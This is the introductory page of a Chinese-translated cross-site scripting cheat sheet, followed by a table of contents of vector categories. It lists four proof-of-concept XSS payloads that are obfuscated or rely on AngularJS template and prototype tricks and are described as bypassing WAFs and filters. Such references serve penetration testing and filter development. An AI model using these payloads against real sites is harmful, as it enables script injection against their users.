此跨站脚本(XSS)备忘单包含许多向量,可以帮助您绕过WAF和过滤器。您可以通过事件,标签或浏览器选择向量,每个向量都包含概念证明。
该备忘单会在2020年进行定期更新。
最近更新:2020年6月4日,星期四08:57:33 +0000。
{{constructor.constructor('alert(1)')()}}
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
';top['\141\154\145\162\164']('\130\123\123');//
';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
中文翻译地址:
目录
事件处理程序
没有用户互动
需要用户互动
限制字元
构架
通讯协定
其他有用的属性
特殊标签
编码方式
混淆
客户端模板注入
VueJS反映
AngularJS沙箱逃逸反映
AngularJS沙箱转义DOM
AngularJS CSP绕过
无脚本攻击
多重发光
WAF绕过全局对象
不可能的实验室
经典向量(XSS加密)
2020跨站脚本[xss]速查表下载地址[pdf]